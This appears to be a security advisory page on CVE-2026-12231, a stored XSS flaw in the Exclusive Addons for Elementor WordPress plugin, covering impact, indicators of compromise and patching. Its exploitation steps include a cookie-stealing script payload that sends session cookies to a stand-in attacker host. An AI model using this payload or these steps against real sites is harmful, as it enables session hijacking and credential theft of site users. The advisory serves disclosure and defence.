CVE-2026-12231
WordPress 취약성 분석 및 완화

개요

CVE-2026-12231 is a Stored Cross-Site Scripting (XSS) vulnerability in the Exclusive Addons for Elementor plugin for WordPress, affecting all versions up to and including 2.7.9.8. The flaw exists in the exad_infobox_image parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. It was published on August 2, 2026, with a patch made available the same day. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

기술적 세부 사항

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from the plugin's failure to properly sanitize user-supplied input in the exad_infobox_image parameter and escape it before rendering in HTML output. The vulnerable code is located in the plugin's infobox.php file (lines 975, 1019–1095, and 1082), where attacker-controlled values are written directly into the page without adequate filtering. Exploitation requires only network access and a low-privilege authenticated account (Contributor or above), with no user interaction needed and a changed scope, meaning the injected script can affect users beyond the attacker's own session (GitHub Advisory, WordPress Trac).

영향

Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all users who visit the affected pages. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and modification of page content. While availability is not directly impacted, the confidentiality and integrity risks extend to all site visitors, including privileged users (GitHub Advisory, Wordfence).

착취 단계

  1. Reconnaissance: Identify WordPress sites running the Exclusive Addons for Elementor plugin at version 2.7.9.8 or earlier, using tools like WPScan or by inspecting plugin directories.
  2. Obtain Contributor access: Register or compromise an account with at least Contributor-level privileges on the target WordPress site.
  3. Navigate to the Infobox element: In the WordPress editor (Elementor), add or edit a page containing the Infobox widget provided by the Exclusive Addons plugin.
  4. Inject malicious payload: Supply a crafted XSS payload (e.g., "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the exad_infobox_image parameter, which is not properly sanitized.
  5. Publish the page: Save and publish the page containing the injected content.
  6. Trigger execution: When any user (including administrators) visits the affected page, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (GitHub Advisory, Wordfence).

타협의 징후

  • Logs: WordPress access logs showing POST requests to page/post edit endpoints by Contributor-level accounts containing unusual script tags or encoded JavaScript in the exad_infobox_image field.
  • File System: Unexpected or recently modified pages/posts in the WordPress database containing <script> tags or JavaScript event handlers within Infobox widget content.
  • Network: Outbound requests from victim browsers to unknown external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from pages using the Exclusive Addons Infobox widget.
  • Application: Presence of encoded payloads (e.g., %3Cscript%3E, javascript:, onerror=) in stored post meta values associated with the exad_infobox_image parameter in the WordPress database (wp_postmeta table).

완화 및 해결 방법

Update the Exclusive Addons for Elementor plugin to a version beyond 2.7.9.8, as a patch was released on August 2, 2026 (changeset 3583929). As an interim measure, restrict Contributor-level and above access to only trusted users, and implement Content Security Policy (CSP) headers to limit inline script execution. Administrators should audit recent content modifications for injected scripts and review accounts with Contributor access (WordPress Trac, Wordfence).

추가 자료


근원이 보고서는 AI를 사용하여 생성되었습니다.

관련 WordPress 취약점:

CVE ID

심각도

점수

기술

구성 요소 이름

CISA KEV 익스플로잇

수정 사항이 있습니다.

게시된 날짜

CVE-2026-16572HIGH8.6
  • logmytrip
아니요아니요Aug 03, 2026
CVE-2026-16539HIGH8.1
  • sm-page-duplicator
아니요아니요Aug 03, 2026
CVE-2026-16563MEDIUM6.5
  • academy
아니요Aug 03, 2026
CVE-2026-16565MEDIUM4.3
  • dokan-lite
아니요Aug 03, 2026
CVE-2026-16564MEDIUM4.3
  • dokan-lite
아니요Aug 03, 2026

무료 취약성 평가

클라우드 보안 태세를 벤치마킹합니다

9개의 보안 도메인에서 클라우드 보안 관행을 평가하여 위험 수준을 벤치마킹하고 방어의 허점을 식별합니다.

평가 요청

추가 Wiz 리소스

맞춤형 데모 받기

맞춤형 데모 신청하기

"내가 본 최고의 사용자 경험은 클라우드 워크로드에 대한 완전한 가시성을 제공합니다."
데이비드 에슬릭최고정보책임자(CISO)
"Wiz는 클라우드 환경에서 무슨 일이 일어나고 있는지 볼 수 있는 단일 창을 제공합니다."
아담 플레처최고 보안 책임자(CSO)
"우리는 Wiz가 무언가를 중요한 것으로 식별하면 실제로 중요하다는 것을 알고 있습니다."
그렉 포니아토프스키위협 및 취약성 관리 책임자